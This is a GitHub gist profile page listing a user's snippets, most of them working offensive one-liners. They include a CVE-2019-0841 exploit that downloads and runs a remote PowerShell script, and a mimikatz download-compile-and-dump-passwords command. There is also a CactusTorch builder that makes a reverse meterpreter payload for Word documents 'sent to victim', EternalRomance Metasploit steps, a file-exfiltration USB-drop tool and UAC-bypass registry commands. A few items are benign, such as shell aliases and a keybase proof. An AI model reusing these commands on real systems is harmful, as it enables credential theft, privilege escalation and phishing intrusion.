Skip to content

Instantly share code, notes, and snippets.

View xillwillx's full-sized avatar
👾
https://gitlab.com/illwill

illwill xillwillx

👾
https://gitlab.com/illwill
382 followers · 10 following
View GitHub Profile
@xillwillx
xillwillx / admin.ps1
Created April 18, 2019 04:57
list local admin accounts
$admins = Gwmi win32_groupuser –computer 127.0.0.1;$admins = $admins |? {$_.groupcomponent –like '*"Administrators"'}; $admins |% {$_.partcomponent –match “.+Domain\=(.+)\,Name\=(.+)$” > $nul;$matches[1].trim('"') + “\” + $matches[2].trim('"') | Select-Object @{Name='Account Name';Expression={$_}}}
@xillwillx
xillwillx / CVE-2019-0841.ps1
Last active June 17, 2020 17:58
CVE-2019-0841 - Overwrite HOST file with "Full Control" permissions given to the user
iex (New-Object net.webclient).downloadstring('https://github.com/FuzzySecurity/PowerShell-Suite/raw/master/Native-HardLink.ps1');start microsoft-edge:;get-process -name MicrosoftEdge | Stop-process;sleep 2;Native-HardLink -Link "$env:localappdata\packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\settings\settings.dat" -target "$env:windir\system32\drivers\etc\hosts";start microsoft-edge:;get-process -name Microsoftedge | stop-process
@xillwillx
xillwillx / gist:97a9fa7e10fc0d5bcca8f717bf76e904
Created January 23, 2019 01:11
Pwnp1 ALOA with OLED
ssh root@172.16.0.1
nano /boot/config.txt
ctrl+w to find
Type: i2c_arm and add the uncommented lines underneath
## i2c_arm
## Enable the ARM's i2c interface
##
## Default off.
##
@xillwillx
xillwillx / .bash_profile
Last active December 28, 2018 13:36
Mac ~/.bash_profile
export PATH="$PATH:/usr/bin/"
alias ll='ls -GFHAf -1' # ll: directory listing in 1 column
alias f='open -a Finder ./' # f: Opens current directory in MacOS Finder
alias cpwd='pwd|tr -d "\n"|pbcopy' # cpwd: copy the working directory path
alias ..="cd ../"
alias ...="cd ../../"
alias ....="cd ../../../"
alias wttr='curl wttr.in/06451?0u'
alias myip='curl -s http://whatismyip.akamai.com/' ;echo
@xillwillx
xillwillx / katz.cmd
Last active December 17, 2023 06:29
mimikatz.cs one-liner
powershell -ExecutionPolicy Bypass -noLogo -Command (new-object System.Net.WebClient).DownloadFile('https://is.gd/Dopn98','katz.cs'); && cd c:\Windows\Microsoft.NET\Framework64\v4.* && csc.exe /unsafe /reference:System.IO.Compression.dll /out:katz.exe katz.cs && InstallUtil.exe /logfile= /LogToConsole=false /U katz.exe && katz.exe log privilege::debug sekurlsa::logonpasswords exit && del katz.*
@xillwillx
xillwillx / CactusTorchDDEAUTO.sh
Last active August 6, 2018 07:25
CactusTorchDDEAUTO
git clone https://github.com/mdsecactivebreach/CACTUSTORCH.git && cd CACTUSTORCH
IP=`ip -4 addr show eth0 | grep -oP '(?<=inet\s)\d+(\.\d+){3}'`
msfvenom -p windows/meterpreter/reverse_https LHOST=$IP LPORT=443 -f raw -o payload.bin
PAYLOAD=$(cat payload.bin | base64 -w 0)
sed -i -e 's|var code = ".*|var code = "'$PAYLOAD'";|' CACTUSTORCH.js
sed -i -e 's|Dim code : code = ".*|Dim code : code = "'$PAYLOAD'"|g' CACTUSTORCH.vbs
sed -i -e 's|Dim code : code = ".*|Dim code : code = "'$PAYLOAD'"|g' CACTUSTORCH.hta
cp -t /var/www/html/ CACTUSTORCH.vbs CACTUSTORCH.js CACTUSTORCH.hta
service apache2 start
echo -e "\n\n\n\nOpen Microsoft Word and press CTRL+F9 and copy any of the payloads below in between the { } then save and send to victim.\n\nJS PAYLOAD:\n\
@xillwillx
xillwillx / gist:6db5cd392acafc1ac486f9852f698be6
Last active September 19, 2018 19:03
EternalRomance Python Example with ReverseTCP Meterpreter
# Test victim IP first to see if exploitable
msfconsole
use auxiliary/scanner/smb/pipe_auditor
set RHOSTS 192.168.128.19
exploit
#*choose pipe name 'netlogon'
######Exploiting the Victim##########
# Setup Meterpreter Handler
@xillwillx
xillwillx / FishSticks.ps1
Created April 29, 2017 18:40 — forked from SadProcessor/FishSticks.ps1
Generate nefarious powershell wrapped in .wsf for USB-Drop Attacks. Will harvest all files with specified extensions from specified folders and send them to specified Gmail account.
<#
.Synopsis
____ _ _ ___ _ _ _
| __(_)__| |_ / __| |_(_)__| |__ ___
| _|| (_-< ' \\__ \ _| / _| / /(_-<
|_| |_/__/_||_|___/\__|_\__|_\_\/__/.v1
"Life is like a box of FishSticks, you never know what you're gonna get..."
Benjamin Buford "Bubba" Blue - 1965.
@xillwillx
xillwillx / .cmd
Last active September 18, 2021 14:20
UAC bypass methods with high integrity - credits to @enigma0x3 / @0rbz_ / @winscripting
**UAC bypass for Win10:**
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" /d "cmd.exe" /f && START /W sdclt.exe && reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" /f
**UAC bypass for Win10:**
reg add HKCU\Software\Classes\ms-settings\shell\open\command /v "DelegateExecute" /f && reg add HKCU\Software\Classes\ms-settings\shell\open\command /d "cmd /c start powershell.exe" /f && START /W fodhelper.exe && reg delete HKCU\Software\Classes\ms-settings /f
**UAC bypass for 7/8/10:**
reg add HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command /d "cmd.exe" /f && START /W CompMgmtLauncher.exe && reg delete HKEY_CURRENT_USER\Software\Classes\mscfile /f
@xillwillx
xillwillx / keybase.md
Created February 11, 2016 06:51

Keybase proof

I hereby claim:

  • I am xillwillx on github.
  • I am illwill (https://keybase.io/illwill) on keybase.
  • I have a public key whose fingerprint is 6D14 E83A 93C6 3380 4F0F FF70 E170 DBAA AE04 6737

To claim this, I am signing this object: